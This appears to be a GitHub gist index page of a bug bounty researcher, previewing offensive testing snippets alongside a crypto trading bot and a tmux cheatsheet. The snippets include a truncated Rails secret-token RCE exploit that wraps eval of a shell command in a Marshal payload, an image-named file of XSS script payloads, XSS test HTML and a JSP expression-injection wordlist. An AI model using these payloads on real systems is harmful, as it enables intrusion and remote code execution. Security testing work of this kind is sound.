Skip to content

Instantly share code, notes, and snippets.

🏠
Programming..............................................................

Arbaz Hussain arbazkiraak

🏠
Programming..............................................................
Block or report user

Report or block arbazkiraak

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View send_urls_to_burp
#!/usr/bin/python3
import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
urls_inp = sys.argv[1]
View bbprograms.txt
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
@arbazkiraak
arbazkiraak / phantonjs-xss.html
Last active Sep 15, 2019 — forked from yeukhon/test.html
Simple XSS detector using PhantomJS
View phantonjs-xss.html
<html>
<head></head>
<body>
<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>
View rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
@arbazkiraak
arbazkiraak / test.jpg
Created Apr 11, 2019
nothing'>"/><ScRipt>prompt(1)</ScRipt>
View test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>
View offsets
[array('i', [143, 150]),
array('i', [207, 214]),
array('i', [753, 760]),
array('i', [931, 938]),
array('i', [1140, 1147]),
array('i', [1390, 1397]),
array('i', [1543, 1550]),
array('i', [1666, 1673]),
array('i', [1950, 1957]),
array('i', [4193, 4200]),
View gist:77bb058366e5d646cf4f58869e4da190
from burp import IBurpExtender,IProxyListener
class BurpExtender(IBurpExtender,IProxyListener):
def registerExtenderCallbacks(self,callbacks):
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
self._callbacks.setExtensionName("IProxyListener Params")
self._callbacks.registerProxyListener(self)
def processProxyMessage(self,messageIsRequest,message):
View jsp-jstl-intruders.txt
${0 }
${0 == pageList.maxPage}
${1}
${1 eq currentPageNumber }
${5}
${5/6}
${a+1 }
${a.academyName}
${a.academyNumber}
${academyNumber==a.academyNumber}
@arbazkiraak
arbazkiraak / CryptoBot.py
Last active Sep 10, 2018
Telegram Bot to automate basics of Crypto Trading
View CryptoBot.py
import requests,json,bs4,time,threading,datetime,logging
from binance.client import Client
requests.packages.urllib3.disable_warnings()
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext.dispatcher import run_async
########### KEYS #######################
updater = Updater(token='<TELEGRAM-TOKEN>')
dispatcher = updater.dispatcher
View tmux_cheatsheet.markdown

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name:

You can’t perform that action at this time.